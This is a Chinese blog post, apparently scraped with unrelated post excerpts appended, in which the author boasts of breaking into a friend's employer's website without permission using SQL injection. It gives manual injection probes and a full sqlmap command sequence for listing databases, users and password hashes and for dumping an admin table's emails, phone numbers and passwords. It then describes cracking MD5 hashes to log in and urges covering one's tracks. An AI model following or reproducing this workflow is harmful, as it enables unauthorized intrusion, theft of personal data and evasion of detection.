如何一步步攻破一家網際網路公司的

2021-07-12 02:21:58 字數 2214 閱讀 1850

最近在研究web安全相關的知識,特別是sql注入類的相關知識。接觸了一些與sql注入相關的工具。週末在家閒著無聊,想把平時學的東東結合起來攻擊一下身邊某個小夥伴去的公司,看看能不能得逞。不試不知道,一試還真tm得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家網際網路公司的。

【作案工具介紹】

(2) sqlmap滲透測試工具

sqlmap是乙個自動化的sql注入工具,其主要功能是掃瞄,發現並利用給定的url的sql注入漏洞。

【作案細節如下】

網際網路公司的官網進行掃瞄,掃瞄結果如下:

為何要挑出這一條呢?因為它對於sql注入比較典型,下面普及下sql注入常用手法。首先用如下語句,確定該**是否存在注入點:

原**

'      出錯或顯示不正常

and 1=1 出錯或顯示不正常

and 1=2 出錯或顯示不正常

如果有出錯,說明存在注入點。

在判斷完

1) 再次確認目標注入點是否可用:

python sqlmap.py -u 

引數:

-u:指定注入點url

結果:

注入結果展示:

a. 引數id存在基於布林的盲注,即可以根據返回頁面判斷條件真假的注入。

b. 引數id存在基於時間的盲注,即不能根據頁面返回內容判斷任何資訊,用條件語句檢視時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

c. 資料庫型別為:mysql 5.0.12

2) 暴庫所有資料庫:

一條命令即可曝出該sqlserver中所有資料庫名稱,命令如下:

python sqlmap.py -u  --dbs  

引數:--dbs:dbs前面有兩條槓,列出所有資料庫。

結果:

結果顯示該sqlserver中共包含3個可用的資料庫。

3) 獲取當前使用的資料庫

python sqlmap.py -u  --current-db

引數:--current-db:當前所使用的資料庫。

結果:4) 獲取當前資料庫使用賬戶

python sqlmap.py -u  --current-user

5) 列出sqlserver所有使用者

python sqlmap.py -u  --users 

6) 獲取當前使用者資料庫賬戶與密碼

python sqlmap.py -u  --passwords

結果顯示該使用者可能無讀取相關系統的許可權。

7) 列出資料庫中的表

python sqlmap.py -u  -d ***_store --tables  

引數:-d:指定資料庫名稱

--tables:列出表

結果:結果顯示共列出了69張表。

8) 列出表中字段

python sqlmap.py -u  -d ***_store -t mall_admin --columns

引數:-d:指定資料庫名稱

-t:指定要列出欄位的表

--columns:指定列出字段

結果:9)暴欄位內容

python sqlmap.py -u  -d ***_store -t mall_admin -c "ag_id,email,id,mobile,name,password,status" --dump

引數:-c :指定要暴的字段

--dump:將結果匯出

如果字段內容太多,需要花費很多時間。可以指定匯出特定範圍的字段內容,命令如下:

python sqlmap.py -u  -d ***_store -t mall_admin -c "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

引數:--start:指定開始的行

--stop:指定結束的行

此條命令的含義為:匯出資料庫***_store中的表mall_admin中的關於字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的資料內容。

結果如下:

通過上圖,我們可以看到admin表中的使用者資訊了。我們將password欄位通過md5解密,可以得到hash的原文密碼,通過使用者名稱和密碼,我們就可以登入該**了。

至此,我們已成功入侵到一家公司的後台,並拿到了相關的資料。不過要在這裡提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦乾淨,不讓別人發現你了!

SQL注入 我是如何一步步攻破一家網際網路公司的

最近在研究web安全相關的知識,特別是sql注入類的相關知識。接觸了一些與sql注入相關的工具。週末在家閒著無聊,想把平時學的東東結合起來攻擊一下身邊某個小夥伴去的公司,看看能不能得逞。不試不知道,一試還真tm得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家網際網路公司的。作...

不止網際網路 開源軟體正在一步步推動汽車科技的創新

現在越來越多的汽車廠商選擇與科技 聯姻 隨著這些公司轉為 軟體驅動型 企業,開源將成為推動其創新並更快更好向前發展的主要因素。目前 78 的公司以某種形式執行著開源軟體,隨著汽車與雲技術的加速融合 如無人駕駛汽車和汽車連線技術 負責構建雲的開源技術將逐步 接管 汽車產業。未來的汽車將把汽車硬體和軟體...

移動網際網路第一步

時間過得真快。轉眼來新公司也快乙個月了。新的單位,新的技術,新的業務,新的領域一切都是新的。感覺自己也很新的。需要充電!現在在村里封閉開發,我們是業務,我們是開發,我們是測試。可能有些不習慣,因為之前都是分工明確的。但是好處就是你可以熟悉業務,開發,測試多個環節。更加融入專案,融入公司進去。能學到更...